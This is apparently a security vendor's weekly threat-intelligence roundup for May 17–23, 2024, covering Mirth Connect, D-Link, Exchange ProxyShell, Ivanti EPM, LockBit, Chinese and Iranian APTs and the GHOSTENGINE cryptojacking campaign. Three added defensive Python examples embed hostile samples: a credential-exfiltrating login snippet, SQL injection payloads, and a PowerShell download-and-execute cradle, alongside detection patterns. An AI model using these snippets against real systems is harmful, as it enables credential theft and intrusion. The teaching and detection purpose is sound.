May 24: Top Threat Actors, Malware, Vulnerabilities and Exploits


Welcome to Picus Security's weekly cyber threat intelligence roundup! 

Each week, our goal is to provide insights into the most recent and significant malware attacks and vulnerability exploitation campaigns that could affect your industry and region. Recognizing that a blog might not fully cover your specific threat intelligence requirements, we are introducing a new platform built to deliver customized cyber threat intelligence that directly addresses your needs.

Our new threat intelligence tool will enable you to identify threats targeting your region and sector, compare your security posture with that of similar organizations, and obtain easy-to-implement mitigation signatures from a variety of vendors. It will also produce a report you can share with peers or within your organization, so that you are well informed and prepared to address cyber threats effectively.

May 24: Latest Vulnerabilities, Exploits and Patches

Here are the most notable vulnerabilities and exploitations observed from May 17 to May 23, 2024.

CVE-2023-43208: CISA Warning About NextGen Healthcare Mirth Connect Deserialization of Untrusted Data Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning about active exploitation of a security flaw in NextGen Healthcare's Mirth Connect [1], adding it to the Known Exploited Vulnerabilities (KEV) catalog. Mirth Connect is an open-source data integration platform that standardizes data exchange between healthcare systems and is widely used in the healthcare sector. The vulnerability, tracked as CVE-2023-43208 [2], is an unauthenticated remote code execution flaw that stems from an incomplete patch for CVE-2023-37679 (CVSS score 9.8). The root cause is the insecure use of the Java XStream library to unmarshal XML payloads, which makes the flaw easy to exploit.

While the nature and timing of the attacks remain unclear, Microsoft observed both nation-state and cybercrime actors exploiting these vulnerabilities for initial access in Q1 2024. To mitigate the risk, CISA requires federal agencies to update to Mirth Connect version 4.4.1 or later by June 10, 2024. Because CVE-2023-43208 bypasses the earlier fix, an instance patched only for CVE-2023-37679 remains exploitable; verify the running version rather than relying on the earlier patch.

CVE-2014-100005 & CVE-2021-40655: CISA Warns of Exploited Vulnerabilities in EOL D-Link Products

CISA has added two vulnerabilities in discontinued D-Link products to its Known Exploited Vulnerabilities (KEV) Catalog [3]. 

The first, CVE-2014-100005, is a cross-site request forgery (CSRF) flaw in legacy D-Link routers that allows attackers to alter device configurations remotely. The second, CVE-2021-40655, affects D-Link DIR-605 routers and allows information disclosure through a forged POST request, exposing login credentials in plain text.

Both vulnerabilities affect routers that have reached End-of-Life (EOL) status, so no vendor patches are expected; the practical remediation is to retire and replace the devices. Federal agencies are required to address these issues by June 6, 2024, under Binding Operational Directive (BOD) 22-01.

MS Exchange Server Flaws Exploited to Deploy Keylogger in Targeted Attacks

An unknown threat actor is exploiting the ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) in Microsoft Exchange Server to deploy keylogger malware against entities in Africa and the Middle East [4]. Identified by Positive Technologies, the campaign has affected over 30 victims, including government agencies, banks, IT companies, and educational institutions, with initial compromises dating back to 2021. The keylogger harvests account credentials by injecting code into the server's Outlook Web Access login page, logon.aspx.

Targeted countries include Russia, the U.A.E., Kuwait, and several others. Organizations are advised to update their Exchange Servers and check for signs of compromise, particularly for unexpected code in the clkLgn() function of the logon.aspx file.
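As an added example (not code from the page or from Positive Technologies), the following script performs the check described above: it extracts the clkLgn() function from a logon.aspx file, compares it with a hash taken from a clean copy, and scans it for credential-harvesting primitives. The two logon.aspx snippets embedded in it are constructed stand-ins, not real Exchange code or the real keylogger, and the suspicious-pattern list is a heuristic assumption. The baseline hash must come from an untouched install of the same Exchange build, since the function body differs between builds.

```python
"""Tamper check for the clkLgn() handler in an Exchange OWA logon.aspx.

Added example, not code from the page or from Positive Technologies.
Assumptions (not from the page): the real clkLgn() body differs between
Exchange builds, so the baseline hash must be taken from a clean copy of the
same build; both logon.aspx snippets below are constructed for this demo and
are neither real Exchange code nor the real keylogger.
"""
import hashlib
import re
from typing import Optional

# Constructed stand-in for an untouched clkLgn() (shape only, not real OWA code).
CLEAN_LOGON_ASPX = """<script type="text/javascript">
function clkLgn() {
    if (gbid("rdoPrvt").checked) {
        var oD = new Date();
        oD.setTime(oD.getTime() + 2 * 7 * 24 * 60 * 60 * 1000);
        document.cookie = "PBack=0; expires=" + oD.toUTCString();
    }
    return true;
}
</script>"""

# Constructed tampered copy: extra statements read the typed credentials and
# beacon them out before the form submits (the shape of the reported tampering,
# not the actual injected code).
TAMPERED_LOGON_ASPX = CLEAN_LOGON_ASPX.replace(
    "    return true;",
    "    var u = gbid('username').value, p = gbid('password').value;\n"
    "    new Image().src = '/owa/auth/logo.gif?u=' + escape(u) + '&p=' + escape(p);\n"
    "    return true;",
)

# Primitives that have no place in a login-button click handler (heuristic).
SUSPICIOUS_PATTERNS = [
    r"gbid\(['\"]password['\"]\)",             # reads the password field
    r"new Image\(\)|XMLHttpRequest|fetch\(",   # beacon / HTTP exfil
    r"document\.cookie\s*=\s*['\"](?!PBack)",  # sets a cookie other than the known one
]


def extract_clklgn(html: str) -> Optional[str]:
    """Return the full source of function clkLgn() by brace matching, or None.
    Braces inside string literals are not handled; adequate for this handler."""
    m = re.search(r"function\s+clkLgn\s*\(\s*\)\s*\{", html)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(html) and depth:
        depth += {"{": 1, "}": -1}.get(html[i], 0)
        i += 1
    return html[m.start():i] if depth == 0 else None


def fingerprint(src: str) -> str:
    """SHA-256 over whitespace-normalized source, so reformatting alone does not alert."""
    return hashlib.sha256(re.sub(r"\s+", " ", src).strip().encode()).hexdigest()


def audit_logon_aspx(html: str, baseline_hash: str) -> dict:
    """Compare clkLgn() with the known-good hash and scan it for exfil primitives."""
    body = extract_clklgn(html)
    if body is None:
        return {"status": "missing", "matches_baseline": False, "hits": []}
    hits = [p for p in SUSPICIOUS_PATTERNS if re.search(p, body)]
    matches = fingerprint(body) == baseline_hash
    status = "clean" if matches and not hits else "tampered"
    return {"status": status, "matches_baseline": matches, "hits": hits}


# In practice: compute this once from a clean install of the same build.
BASELINE = fingerprint(extract_clklgn(CLEAN_LOGON_ASPX))

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_LOGON_ASPX), ("tampered", TAMPERED_LOGON_ASPX)):
        print(label, audit_logon_aspx(page, BASELINE))
```

Run it against the live file (on a default install, under the Exchange directory at FrontEnd\HttpProxy\owa\auth\logon.aspx) and against a clean copy from the same build. Any hash mismatch deserves a manual diff even if no pattern fires, because the heuristics only catch the obvious exfiltration shapes.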

Ivanti Patches Critical Remote Code Execution Flaws in Endpoint Manager

Ivanti has released patches for multiple critical security vulnerabilities in its Endpoint Manager (EPM) that could allow remote code execution [5]. 

Six of these flaws (CVE-2024-29822 through CVE-2024-29827) are SQL injection vulnerabilities with a CVSS score of 9.6 that allow an unauthenticated attacker on the same network to execute arbitrary code [6]. 

The remaining four (CVE-2024-29828 through CVE-2024-29830, and CVE-2024-29846) require authentication and have a CVSS score of 8.4. Ivanti has also addressed a high-severity flaw, CVE-2024-29848, in Avalanche version 6.4.3.602. Ivanti states that it is not aware of any exploitation of these vulnerabilities in the wild.
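To make the vulnerability class concrete, here is an added example in Python (not Ivanti's code, which the advisory does not show): a string-built query of the kind that produces SQL injection beside its parameterized fix, exercised with two constructed payloads against an in-memory SQLite table whose name, columns and rows are assumptions.

```python
"""Vulnerable string-built SQL beside its parameterized fix.

Added example, not Ivanti's code (the affected EPM code is not shown in the
advisory or on this page); it illustrates the injection class the advisory
names. The SQLite database, table, columns and rows are constructed here.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed inventory table standing in for whatever the product queries."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE devices(hostname TEXT, site TEXT, agent_token TEXT);"
        "INSERT INTO devices VALUES ('ws-01', 'hq', 'tok-hq-1');"
        "INSERT INTO devices VALUES ('ws-02', 'hq', 'tok-hq-2');"
        "INSERT INTO devices VALUES ('srv-09', 'branch', 'tok-br-9');"
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, hostname: str) -> list:
    """The bug: caller-controlled text is spliced into the statement itself."""
    sql = f"SELECT hostname, agent_token FROM devices WHERE hostname = '{hostname}'"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn: sqlite3.Connection, hostname: str) -> list:
    """The fix: a bound parameter is always data, never SQL, whatever it contains."""
    sql = "SELECT hostname, agent_token FROM devices WHERE hostname = ?"
    return conn.execute(sql, (hostname,)).fetchall()


# Constructed payloads: a tautology that widens the WHERE clause, and a UNION
# that reads a different table (here SQLite's schema catalog) through the same hole.
TAUTOLOGY = "' OR '1'='1"
UNION_READ = "' UNION SELECT name, sql FROM sqlite_master --"


def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable_tautology": lookup_vulnerable(conn, TAUTOLOGY),  # every row
        "vulnerable_union": lookup_vulnerable(conn, UNION_READ),     # schema leak
        "fixed_tautology": lookup_fixed(conn, TAUTOLOGY),            # no rows
        "fixed_union": lookup_fixed(conn, UNION_READ),               # no rows
        "fixed_legit": lookup_fixed(conn, "ws-01"),                  # intended use
    }


if __name__ == "__main__":
    for key, rows in demo().items():
        print(f"{key}: {rows}")
```

The page does not say how the Ivanti flaws turn injection into code execution, and the example stops at data exposure; the defensive point is the same either way: bind parameters, and never concatenate caller input into SQL.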

May 24: Top Threat Actors Observed in the Wild

Here are the top threat actors observed from May 17 to May 23, 2024.

LockBit Ransomware Gang Claims Responsibility for London Drugs Cyberattack and Threatens Data Leak

  • Victim Organization: London Drugs
  • Victim Location: Canada
  • Sectors: Pharmacy
  • Threat Actor: LockBit
  • Threat Actor Aliases: LockBitSupp
  • Actor Motivation: Financial Gain

The LockBit ransomware gang has claimed responsibility for the April 28 cyberattack on Canadian pharmacy chain London Drugs [7], which forced the temporary closure of all its retail stores across Western Canada. Although London Drugs reported no evidence that customer or employee data was compromised, LockBit is threatening to publish allegedly stolen data after ransom negotiations failed; its demand was $25 million. London Drugs, which employs over 9,000 people, has reopened its stores but continues to experience website issues. In response, the company has notified employees and offered complimentary credit monitoring and identity theft protection services. LockBit, known for targeting high-profile organizations worldwide, remains active despite recent law enforcement takedowns and significant operational disruptions.

Operation Diplomatic Specter: Chinese APT Group Targets Government Entities in Espionage Campaign

  • Victim Industry & Operations: Diplomatic and economic missions, embassies, military operations, political meetings, and ministries
  • Victim Location: Middle East, Africa, and Asia
  • Threat Actor: TGR-STA-0043
  • Threat Campaign Name: Operation Diplomatic Specter
  • Malware: TunnelSpecter Backdoor, SweetSpecter Backdoor (variants of Gh0st RAT)
  • CVE: ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), ProxyLogon (CVE-2021-26855)

A Chinese APT group, codenamed TGR-STA-0043, has been conducting cyber espionage operations against governmental entities in the Middle East, Africa, and Asia since late 2022 [8]. In the campaign, known as Operation Diplomatic Specter, the group focuses on diplomatic and economic missions, embassies, military operations, political meetings, and ministries. It uses rare email exfiltration techniques and backdoors such as TunnelSpecter and SweetSpecter, both variants of Gh0st RAT.

Initial access is often gained by exploiting known Exchange Server vulnerabilities such as ProxyLogon and ProxyShell. The group closely tracks geopolitical developments and exfiltrates sensitive information related to military and diplomatic activities. Its methods and infrastructure overlap with those of other Chinese state-aligned groups such as APT27, Mustang Panda, and Winnti.

Threat Actor Chucky Claims Knowmad Mood Data Breach via LeakBase

  • Victim Organization: Knowmad Mood
  • Victim Location: Spain, Italy, Portugal, United States, Morocco, United Kingdom, Uruguay
  • Threat Actor: Chucky, LeakBase
  • Threat Actor Aliases: Sqlrip, Chuckies
  • Actor Motivation: Cyber Espionage

The threat actor Chucky, owner of the cybercrime forum LeakBase, has claimed responsibility for a data breach at Spanish IT services company Knowmad Mood [9].

The breach, allegedly stemming from the company's CRM system, includes sensitive employee data such as names, email addresses, and performance metrics. Knowmad Mood, formerly atSistemas, provides consulting and software development services in several countries. Screenshots shared by Chucky on LeakBase show a cache of files, including HTML, Excel, and Word documents. Chucky, known for previous breaches and operating under various aliases, gained prominence in the cybercriminal community after the shutdown of BreachForums. The stolen data raises significant security concerns for Knowmad Mood's employees and customers.

May 24: Latest Malware Attacks

Here are the malware attacks and campaigns that were active in the third week of May.

MOIS-Linked Hackers Behind Destructive Attacks on Albania and Israel

  • Victim Location: Albania, Israel
  • Sectors: Government, Technology
  • Threat Actor: Iranian MOIS
  • Threat Actor Aliases: Homeland Justice, Karma, Storm-0842, Void Manticore
  • Actor Motivation: Destructive Attack
  • Malware: Cl Wiper, No-Justice, BiBi, Karma Shell
  • CVEs: CVE-2019-0604

Iranian MOIS-linked hackers, tracked as Void Manticore (also known as Storm-0842 by Microsoft), are responsible for destructive wiper attacks on Albania and Israel [10]. Operating under the personas Homeland Justice and Karma, the group has conducted attacks since July 2022 using custom wipers such as Cl Wiper, No-Justice, and BiBi. It gains initial access by exploiting known vulnerabilities in internet-facing applications (for example CVE-2019-0604, a Microsoft SharePoint remote code execution flaw), then moves laterally over RDP, SMB, and FTP. 

The group often deploys web shells, including a custom one named Karma Shell. Its operations show close coordination with another Iranian threat actor, Scarred Manticore (Storm-0861), pointing to a systematic handoff procedure; Microsoft previously noted this collaboration, with multiple Iranian actors handling distinct attack phases. Void Manticore's dual approach combines psychological warfare with data destruction, amplifying the impact on targeted organizations.

Advanced Cryptojacking Campaign REF4578 Exploits Vulnerable Drivers to Evade Detection and Escalate Privileges

  • Victim Location: China, Hong Kong, Netherlands, Japan, United States, Germany, South Africa, Sweden
  • Sectors: Energy, Financial, Government
  • Actor Motivation: Financial Gain
  • Threat Campaign Name: REF4578 (also known as HIDDEN SHOVEL)
  • Malware: GHOSTENGINE payload, XMRig

Researchers have uncovered a sophisticated cryptojacking campaign, dubbed REF4578 (also known as HIDDEN SHOVEL) [11], that uses Bring Your Own Vulnerable Driver (BYOVD) techniques: it loads legitimately signed drivers with known vulnerabilities and abuses them from user mode. The campaign's GHOSTENGINE payload disables security solutions to evade detection and escalate privileges. 

The first observed stage is a deceptive executable, "Tiworker.exe," named after the legitimate Windows Modules Installer Worker, which runs a PowerShell script that retrieves further malicious scripts from a command-and-control (C2) server. The campaign predominantly targets servers in China, but infections have also been observed in other countries. Key components include the vulnerable drivers "aswArPot.sys" and "IObitUnlockers.sys," used respectively to terminate EDR processes and to delete security agents. The core payload, "smartsscreen.exe" (a name mimicking the legitimate smartscreen.exe), disables security processes and executes the XMRig miner, directing mined cryptocurrency to the attackers' wallets. 

To counter this campaign, security teams should monitor for unusual PowerShell activity, suspicious process execution (including loads of known vulnerable drivers), and network traffic to crypto-mining pools, and use YARA rules to detect GHOSTENGINE infections.
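As an added example (not from the page, Elastic or Antiy), the following Python encodes the detection guidance above as rules run over constructed Sysmon-style events: a Tiworker.exe running from outside its legitimate locations, a hidden/bypass PowerShell download cradle, loads of the two named vulnerable drivers, the smartsscreen.exe typosquat, and outbound connections to Stratum-style mining ports. The event schema, every path, the list of legitimate TiWorker.exe directories and the port list are assumptions; only the file names come from the write-up.

```python
"""Detection rules for the GHOSTENGINE tradecraft described above, run over
constructed Sysmon-style events.

Added example, not code from the page, Elastic or Antiy. Assumptions: the
event schema, every file path, the list of legitimate TiWorker.exe locations,
and the mining-pool port list (commonly used Stratum ports, not indicators
taken from the report). Only the file names come from the write-up.
"""
import ntpath
import re

# Constructed events (not a real capture). Field shapes loosely follow Sysmon
# Event ID 1 (ProcessCreate), 3 (NetworkConnect) and 6 (DriverLoad).
EVENTS = [
    {"id": 1, "image": r"C:\Windows\WinSxS\amd64_servicingstack_10.0.1\TiWorker.exe",
     "cmdline": "TiWorker.exe -Embedding", "parent": r"C:\Windows\System32\svchost.exe"},
    {"id": 1, "image": r"C:\Users\Public\Tiworker.exe",
     "cmdline": "Tiworker.exe", "parent": r"C:\Windows\explorer.exe"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.7/get.png')\"",
     "parent": r"C:\Users\Public\Tiworker.exe"},
    {"id": 6, "image": r"C:\Windows\Temp\aswArPot.sys", "signed": True},
    {"id": 6, "image": r"C:\Windows\Temp\IObitUnlockers.sys", "signed": True},
    {"id": 1, "image": r"C:\ProgramData\smartsscreen.exe",
     "cmdline": "smartsscreen.exe", "parent": r"C:\Users\Public\Tiworker.exe"},
    {"id": 3, "image": r"C:\ProgramData\smartsscreen.exe",
     "dst_ip": "198.51.100.23", "dst_port": 14444},
    {"id": 3, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_ip": "198.51.100.50", "dst_port": 443},
]

# Driver file names given in the write-up; legitimately signed, abused via BYOVD.
BYOVD_DRIVERS = {"aswarpot.sys", "iobitunlockers.sys"}
# Assumption: where the real TiWorker.exe (Windows Modules Installer Worker) lives.
LEGIT_TIWORKER_DIRS = ("c:\\windows\\winsxs\\", "c:\\windows\\servicing\\")
# Assumption: Stratum ports commonly used by Monero pools; tune to your environment.
STRATUM_PORTS = {3333, 4444, 5555, 7777, 14444}
# Hidden window, policy bypass, encoded command, or download-and-execute cradle.
PS_SUSPICIOUS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass|-e(nc|ncodedcommand)\b"
    r"|downloadstring|downloadfile|\biex\b|invoke-expression",
    re.IGNORECASE,
)


def evaluate(events: list) -> list:
    """Return (rule_name, detail) tuples for every event that trips a rule."""
    alerts = []
    for ev in events:
        image = ev.get("image", "")
        name = ntpath.basename(image).lower()
        if ev["id"] == 1:
            if name == "tiworker.exe" and not image.lower().startswith(LEGIT_TIWORKER_DIRS):
                alerts.append(("tiworker_masquerade", image))
            if name == "smartsscreen.exe":  # one letter off from smartscreen.exe
                alerts.append(("smartscreen_typosquat", image))
            if name in ("powershell.exe", "pwsh.exe") and PS_SUSPICIOUS.search(ev.get("cmdline", "")):
                alerts.append(("suspicious_powershell", ev["cmdline"]))
        elif ev["id"] == 6 and name in BYOVD_DRIVERS:
            alerts.append(("byovd_driver_load", image))
        elif ev["id"] == 3 and ev.get("dst_port") in STRATUM_PORTS:
            alerts.append(("possible_mining_pool_traffic",
                           f"{name} -> {ev['dst_ip']}:{ev['dst_port']}"))
    return alerts


if __name__ == "__main__":
    for rule, detail in evaluate(EVENTS):
        print(f"[{rule}] {detail}")
```

Feed it real ProcessCreate, DriverLoad and NetworkConnect events after mapping the field names. The driver-load rule is the highest-fidelity of the five; if the vendor products that ship those drivers are legitimately installed, restrict it to loads from outside their install directories. The port rule is the noisiest and needs tuning against your own egress baseline.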

References

[1] “CISA Adds Two Known Exploited Vulnerabilities to Catalog,” Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/alerts/2024/05/20/cisa-adds-two-known-exploited-vulnerabilities-catalog. [Accessed: May 23, 2024]

[2] N. Sunkavally, “NextGen Mirth Connect Remote Code Execution Vulnerability (CVE-2023-43208),” Horizon3.ai, Oct. 25, 2023. Available: https://www.horizon3.ai/attack-research/attack-blogs/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/. [Accessed: May 23, 2024]

[3] I. Arghire, “CISA Warns of Exploited Vulnerabilities in EOL D-Link Products,” SecurityWeek, May 17, 2024. Available: https://www.securityweek.com/cisa-warns-of-exploited-vulnerabilities-in-eol-d-link-products/. [Accessed: May 23, 2024]

[4] “MS Exchange Server Flaws Exploited to Deploy Keylogger in Targeted Attacks,” The Hacker News, May 22, 2024. Available: https://thehackernews.com/2024/05/ms-exchange-server-flaws-exploited-to.html. [Accessed: May 23, 2024]

[5] “Ivanti Patches Critical Remote Code Execution Flaws in Endpoint Manager,” The Hacker News, May 23, 2024. Available: https://thehackernews.com/2024/05/ivanti-patches-critical-remote-code.html. [Accessed: May 23, 2024]

[6] “KB: Security Advisory EPM May 2024,” Ivanti Community. Available: https://forums.ivanti.com/s/article/KB-Security-Advisory-EPM-May-2024?language=en_US. [Accessed: May 23, 2024]

[7] S. Gatlan, “LockBit says they stole data in London Drugs ransomware attack,” BleepingComputer, May 21, 2024. Available: https://www.bleepingcomputer.com/news/security/lockbit-says-they-stole-data-in-london-drugs-ransomware-attack/. [Accessed: May 23, 2024]

[8] “Inside Operation Diplomatic Specter: Chinese APT Group’s Stealthy Tactics Exposed,” The Hacker News, May 23, 2024. Available: https://thehackernews.com/2024/05/inside-operation-diplomatic-specter.html. [Accessed: May 23, 2024]

[9] J. Alan, “Threat Actor Chucky, Owner of LeakBase Claims Knowmad Mood Data Breach,” The Cyber Express, May 20, 2024. Available: https://thecyberexpress.com/chucky-leakbase-knowmad-mood-data-breach/. [Accessed: May 23, 2024]

[10] “Iranian MOIS-Linked Hackers Behind Destructive Attacks on Albania and Israel,” The Hacker News, May 20, 2024. Available: https://thehackernews.com/2024/05/iranian-mois-linked-hackers-behind.html. [Accessed: May 23, 2024]

[11] J. Alan, “New Cryptojacking Campaign Exploits Vulnerable Drivers to Evade Security and Gain Privileges,” The Cyber Express, May 22, 2024. Available: https://thecyberexpress.com/ghostengine-campaign-exploits-drivers/. [Accessed: May 23, 2024]